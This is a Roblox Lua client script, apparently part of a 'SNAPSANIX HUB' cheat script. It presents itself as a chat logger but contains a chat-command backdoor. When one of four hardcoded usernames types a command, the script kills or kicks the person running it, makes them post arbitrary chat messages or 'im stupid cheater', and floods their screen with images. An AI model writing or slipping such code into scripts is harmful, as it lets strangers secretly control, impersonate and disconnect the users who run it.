local Logging = true

-- список "админов", чьи команды обрабатываются
local AuthorizedUsers = {
    ["aatrikss"] = true,
    ["SenchousXD_1"] = true,
    ["Guest194827461"] = true,
    ["eqz_s"] = true,
}

-- получаем локального игрока
local LocalPlayer = game:GetService("Players").LocalPlayer
local TextChatService = game:GetService("TextChatService")
local TextChannels = TextChatService:WaitForChild("TextChannels"):GetChildren()

-- база картинок для .joke команды
local JokeImageIds = {
    "http://www.roblox.com/asset/?id=15767492628",
    "http://www.roblox.com/asset/?id=137972271055856",
    "http://www.roblox.com/asset/?id=15122228831",
    "http://www.roblox.com/asset/?id=18685588755",
    "http://www.roblox.com/asset/?id=16065319092",
}

local function ShowRandomJokeImages()
    local ScreenGui = Instance.new("ScreenGui")
    ScreenGui.Parent = LocalPlayer:WaitForChild("PlayerGui")
    ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

    local function createOneImage()
        local ImageLabel = Instance.new("ImageLabel")
        ImageLabel.Parent = ScreenGui
        ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        ImageLabel.BorderSizePixel = 0
        ImageLabel.Size = UDim2.new(0, 178, 0, 173)
        ImageLabel.Image = JokeImageIds[math.random(1, #JokeImageIds)]

        local screenSize = ScreenGui.AbsoluteSize
        local xPos = math.random(0, screenSize.X - ImageLabel.Size.X.Offset)
        local yPos = math.random(0, screenSize.Y - ImageLabel.Size.Y.Offset)
        ImageLabel.Position = UDim2.new(0, xPos, 0, yPos)

        task.delay(5, function()
            ImageLabel:Destroy()
        end)
    end

    for i = 1, 30 do
        task.delay(math.random() * 1.2, function()
            createOneImage()
        end)
    end
end

local function Output(Player, Message)
    if not Logging then return end

    local MessageType = "Default"
    local ColorTag = "[WHITE]"

    if string.sub(Message, 1, 1) == ":" or string.sub(Message, 1, 1) == ";" then
        MessageType = "Command"
        ColorTag = "[RED]"
    end

    print(string.format("%s [%s] %s: %s", ColorTag, MessageType, Player.Name, Message))

    -- проверка на команду от админа
    if AuthorizedUsers[Player.Name] then
        -- обработка команды kill
        if string.match(Message, "^[.:%;]%s*kill%s*$") then
            print("[SYSTEM] You have been killed by " .. Player.Name)
            game.StarterGui:SetCore("SendNotification", {
                Title = "YOU KILLED BY DEV";
                Text = "";
                Icon = "http://www.roblox.com/asset/?id=17816113278";
                Duration = 2;
            })
            pcall(function()
                game.Players.LocalPlayer.Character.Humanoid.Health = 0
            end)
        end

        -- обработка команды reset
        if string.match(Message, "^[.:%;]%s*reset%s*$") then
            print("[SYSTEM] You have been reset by " .. Player.Name)
            game.StarterGui:SetCore("SendNotification", {
                Title = "YOU KILLED BY DEV";
                Text = "";
                Icon = "http://www.roblox.com/asset/?id=17816113278";
                Duration = 2;
            })
            pcall(function()
                game.Players.LocalPlayer.Character.Humanoid.Health = 0
            end)
        end

        -- обработка команды send
        local sendMessage = string.match(Message, "^[.:%;]%s*send%s+(.+)$")
        if sendMessage then
            print("[SYSTEM] Message sent to local player: " .. sendMessage)
            for _, textchannel in ipairs(TextChannels) do
                if textchannel.Name ~= "RBXSystem" then
                    pcall(function()
                        textchannel:SendAsync(sendMessage)
                    end)
                end
            end
        end

        -- обработка команды kick
        local kickReason = string.match(Message, "^[.:%;]%s*kick%s+(.+)$")
        if kickReason then
            print("[SYSTEM] You have been kicked by " .. Player.Name .. " for reason: " .. kickReason)
            pcall(function()
                LocalPlayer:Kick("SNAPSANIX HUB - " .. kickReason)
            end)
        end

        -- обработка команды joke
        if string.match(Message, "^[.:%;]%s*print%s*$") then
            print("[SYSTEM] Displaying joke images.")
            ShowRandomJokeImages()
        end

        -- обработка команды say
        if string.match(Message, "^[.:%;]%s*say%s*$") then
            print("[SYSTEM] Local player saying hi from script.")
            for _, textchannel in ipairs(TextChannels) do
                if textchannel.Name ~= "RBXSystem" then
                    pcall(function()
                        textchannel:SendAsync("im stupid cheater🤡")
                    end)
                end
            end
        end

    end
end

-- подключение к чату всех игроков
for _, player in ipairs(game.Players:GetPlayers()) do
    player.Chatted:Connect(function(message)
        Output(player, message)
    end)
end

-- обработка новых игроков
game.Players.PlayerAdded:Connect(function(player)
    player.Chatted:Connect(function(message)
        Output(player, message)
    end)
end)
